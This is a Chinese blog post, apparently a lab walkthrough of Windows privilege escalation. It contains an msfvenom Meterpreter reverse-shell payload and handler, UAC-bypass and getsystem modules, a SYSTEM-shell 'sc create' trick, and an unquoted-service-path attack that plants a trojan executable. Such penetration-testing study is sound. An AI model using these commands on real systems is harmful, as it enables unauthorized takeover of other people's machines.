首页 > 系统相关 >windows提权(下)

windows提权(下)

时间:2023-08-27 17:34:23浏览次数:45  
标签:exe windows 提权 exploit 管理员 权限

权限提升:

systeminfo看补丁

官网找漏洞:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/securitybulletins2017

payloads下载:https://github.com/SecWiki/windows-kernel-exploits

这里用巴西烤肉:

pr.exe

windows提权(下)_重启

新建用户:

windows提权(下)_重启_02

windows提权(下)_Windows_03

UAC提权:

vista以后引入的安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。

当前获得的权限是存在于管理员组的时候但是并且是administrator这个用户,此时就可能需要我们进行绕过UAC的操作,否则虽然是管理员组但是实际上并没有管理员所对应的高权限操作,这个时候就需要bypass uac

msf提权:

新增windows10用户:

windows提权(下)_重启_04

msf:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.146 LPORT=4444 -f exe -o payload.exe

下载:

windows提权(下)_重启_05

切换账号:

windows提权(下)_重启_06

没有vmtools,用共享文件夹:

windows提权(下)_system权限_07

windows提权(下)_system权限_08

windows提权(下)_system权限_09

windows提权(下)_Windows_10

监听:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.31.146

set lport 4444

exploit

windows提权(下)_system权限_11

windows提权(下)_system权限_12

guid:查看当前权限:

windows提权(下)_Windows_13

getsystem提权:

失败:

windows提权(下)_Windows_14

输入background

use exploit/windows/local/ask

set session 2

exploit

未成功。

windows提权(下)_重启_15

除非管理员输入密码,建立新的会话

这两个模块:

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection

windows提权(下)_Windows_16

没戏,成功几率小

也可以关注:exploit/windows/local/ 这里都是提权的内容

windows提权(下)_重启_17

sc命令提权(administrator–>system):

sc命令类似于控制面板的服务,

sc Create syscmd binPath= “cmd /K start” type= own type= interact

windows提权(下)_重启_18

sc start systcmd,就得到了一个system权限的cmd环境

不带引号的服务路径

当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

带空格的路径要带引号

错误的配置看这条命令:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """

windows提权(下)_Windows_19

我们可以将msf的muma放到这个路径下下,然后重启机器,此时,反弹回来的shell,则是一个system的shell

一个叫program.exe,另一个叫Documents.exe。随便找个exe

重启一下:

windows提权(下)_重启_20

不安全的服务权限:

即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它。

windows提权(下)_Windows_21

AccessChk工具可以用来查找用户可以修改的服务: accesschk.exe -uwcqv “Authenticated Users” * /accepteula accesschk.exe -uwcqv “user” * 也可以上传msf相关模块的muma

标签:exe,windows,提权,exploit,管理员,权限
From: https://blog.51cto.com/u_16172166/7253741

相关文章

  • [Microsoft Azure] Microsoft Azure VM Windows系统盘扩容
    本文将详细介绍如何扩展MicrosoftAzureVMWindows系统盘容量。您将学到如何在AzurePortal中调整磁盘大小,以及如何在Windows操作系统内部扩展分区,以实现系统盘容量的扩展。 随着应用程序和数据的不断增长,您可能会发现现有的MicrosoftAzure虚拟机(VM)Windows系统盘容量不再满......
  • Windows 11 22H2 中文版、英文版 (x64、ARM64) 下载 (updated Aug 2023)
    Windows1122H2中文版、英文版(x64、ARM64)下载(updatedAug2023)Windows11,version22H2,2023年8月更新请访问原文链接:https://sysin.org/blog/windows-11/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org全新推出Windows11全新Windows体验,让您与热......
  • Windows 10, version 22H2 (updated Aug 2023) 中文版、英文版下载
    Windows10,version22H2(updatedAug2023)中文版、英文版下载Windows1022H2企业版arm64x64请访问原文链接:https://sysin.org/blog/windows-10/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgWindows10更新历史记录Windows10,version22H2,alledit......
  • Windows 11 绕过 TPM 方法总结,通用免 TPM 镜像下载 (2023 年 8 月更新)
    Windows11绕过TPM方法总结,通用免TPM镜像下载(2023年8月更新)在虚拟机、Mac电脑和TPM不符合要求的旧电脑上安装Windows11的通用方法总结请访问原文链接:https://sysin.org/blog/windows-11-no-tpm/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org本文......
  • Windows Server 2022 中文版、英文版下载 (updated Aug 2023)
    WindowsServer2022中文版、英文版下载(updatedAug2023)WindowsServer2022正式版,2023年8月更新请访问原文链接:https://sysin.org/blog/windows-server-2022/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org早期直观体验版本21H2,根据名称预计今年秋季......
  • Windows 10 on ARM, version 22H2 (updated Aug 2023) ARM64 AArch64 中文版、英文版
    Windows10onARM,version22H2(updatedAug2023)ARM64AArch64中文版、英文版下载基于ARM的Windows10请访问原文链接:https://sysin.org/blog/windows-10-arm/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org基于ARM的Windows10起初,Windows10(与Win......
  • Linux 提权
    普通用户提权[test@ahu~]$whoamitest//登陆到普通用户,发现创建不了其他用户[test@ahu~]$useraddaaa-bash:/usr/sbin/useradd:Permissiondenied进行身份变换[test@ahu~]$mkdir/tmp/exploit[test@ahu~]$ln/bin/ping/tmp/exploit/target[test@ahuexploit]......
  • windows10下SQL Prompt安装图文教程
    一、下载安装官网或者教程:www.red-gate.comvs可以去插件库       二、激活失效激活失效:方法1:在本地hosts加入以下代码:127.0.0.1licensing.red-gate.com127.0.0.1www.red-gate.com127.0.0.1red-gate.com127.0.0.1productusage.red-gate.com127.0.......
  • windows提权(上)
    只能搞个阉割版,不放工具了。我这里分开成两个部分传mimikatz读密码:privilege::debug//提升权限sekurlsa::logonpassWords//抓取密码xp不支持而已,win7可以laZagne.exe读取密码:linux,windows都支持选项:效果:laZagne.exeall>>1.txt#导出结果高版本2016,2012则可以读取hash,比如Pw......
  • Windows线程API —CreateTimerQueueTimer/DeleteTimerQueueTimer的使用
    问题代码:1#include<windows.h>2#include<iostream>3#include<thread>4HANDLEh1;5HANDLEh2;67voidCALLBACKtest(PVOIDa,BOOLEANb)8{9std::cout<<"ThisatestfunctionexcutedbyThread:"<<......